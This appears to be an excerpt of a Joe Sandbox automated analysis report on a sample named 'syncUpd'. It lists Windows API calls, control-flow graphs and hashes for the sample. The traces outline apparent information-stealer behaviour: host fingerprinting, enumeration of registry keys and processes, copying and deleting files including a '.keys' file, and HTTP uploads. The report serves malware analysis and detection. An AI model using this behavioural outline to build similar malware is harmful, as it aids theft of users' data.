                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2228671196-0
                                                                                                                                                                                                                                  • Opcode ID: 1be8ab2a907d9e706c53aba61d014c6190d35d913e1d6b750a15abe81ea94ca1
                                                                                                                                                                                                                                  • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1be8ab2a907d9e706c53aba61d014c6190d35d913e1d6b750a15abe81ea94ca1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (one basic block per line, followed by the edges that leave it)

control_flow_graph
1305 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA
1320 404604
1305->1320
1321 40460b-40460f
1305->1321
1320->1321
1322 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA
1321->1322
1323 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0
1321->1323
1322->1323
1409 404793-404797
1322->1409
1333 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8
1323->1333
1334 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00
1323->1334
1334->1333
1410 4047a5
1409->1410
1411 404799-4047a3
1409->1411
1412 4047af-4047e2 HttpOpenRequestA
1410->1412
1411->1412
1413 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA
1412->1413
1414 404b7e-404b85 InternetCloseHandle
1412->1414
1525 404af2-404b1c InternetReadFile
1413->1525
1414->1323
1526 404b27-404b79 InternetCloseHandle call 416e00
1525->1526
1527 404b1e-404b25
1525->1527
1526->1414
1527->1526
1528 404b29-404b67 call 416fb0 call 416ea0 call 416e00
1527->1528
1528->1525
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0071DC68), ref: 004045FA
                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,0071DB88), ref: 00404AA8
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                  • String ID: "$"$------$------$------$0cr$8me
                                                                                                                                                                                                                                  • API String ID: 460715078-1354028962
                                                                                                                                                                                                                                  • Opcode ID: a96af3eb48350165ce07f11a18bbf656ab0394dc54422d4bf228e890d6c8bbf5
                                                                                                                                                                                                                                  • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a96af3eb48350165ce07f11a18bbf656ab0394dc54422d4bf228e890d6c8bbf5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0071FD48,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                    • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1973479514-0
                                                                                                                                                                                                                                  • Opcode ID: e15e7b3818335824e92093497ec12c2f43f4824fee4a3fb3cd78a1c5c67f75d1
                                                                                                                                                                                                                                  • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e15e7b3818335824e92093497ec12c2f43f4824fee4a3fb3cd78a1c5c67f75d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 1702 40fd10-4109b7 call 416d40 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4141c0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414300 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414380 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4143c0 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414400 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414450 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4144b0 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414530 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414570 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414710 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 GetCurrentProcessId call 415b70 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414740 
call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414800 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4147c0 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414960 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414ed0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414a00 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414ae0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414ae0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414de0 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 call 416d40 call 401500 call 404dc0 call 416e00 * 2 call 413220
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                    • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                    • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,00720768,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                    • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,00724C90,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                    • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                    • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,007250D8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0071DB48), ref: 0041438F
                                                                                                                                                                                                                                    • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,007250D8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0071DB48), ref: 00414396
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0071DA18,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                    • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                    • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                    • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                    • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                    • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                    • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                    • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                    • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00724D08,00000000,?,0041D758,00000000,?,00000000,00000000,?,00725238,00000000), ref: 004144C0
  • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
  • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
  • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,00724D08,00000000,?,0041D758,00000000,?,00000000,00000000,?,00725238,00000000), ref: 00414542
  • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
  • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
  • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
  • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
  • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
  • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
• GetCurrentProcessId.KERNEL32(00000000,?,00725458,00000000,?,0041D76C,00000000,?,00000000,00000000,?,00724D80,00000000,?,0041D768,00000000), ref: 0041037E
  • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
  • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
  • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
  • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
  • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
  • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,00720A78,00000000,00020119,00000000), ref: 0041477B
  • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,007252B8,00000000,00000000,000000FF,000000FF), ref: 0041479C
  • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
  • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
  • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
  • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
  • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
  • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00724B88,00000000,?,0041D774,00000000,?,00000000,00000000,?,00724DC8), ref: 0041496D
  • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
  • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
  • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
  • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
  • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
  • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
  • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
  • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
  • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,007229B8,00000000,00020019,00000000,0041D289), ref: 00414B41
  • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
  • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
  • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
  • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
  • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
  • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
  • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
  • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
  • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
• lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
  • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
  • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
  • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
• String ID: (Nr$0Lr$8Rr$8Tr$@Nr$E.A$HLr$PMr$XNr$XTr$hMr$pKr$Kr$Mr
• API String ID: 1035121393-1129311606
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• strtok_s.MSVCRT ref: 0040F667
• strtok_s.MSVCRT ref: 0040FA8F
  • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
  • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: strtok_s$lstrcpylstrlen
• String ID: Pr$pNr
• API String ID: 348468850-1981644568
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• memset.MSVCRT ref: 004012E7
  • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
  • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
  • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
  • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
  • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
• lstrcat.KERNEL32(?,00000000), ref: 0040130F
• lstrlen.KERNEL32(?), ref: 0040131C
• lstrcat.KERNEL32(?,.keys), ref: 00401337
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
  • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0071FD48,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
  • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
  • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
  • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
  • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
  • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
  • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
  • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
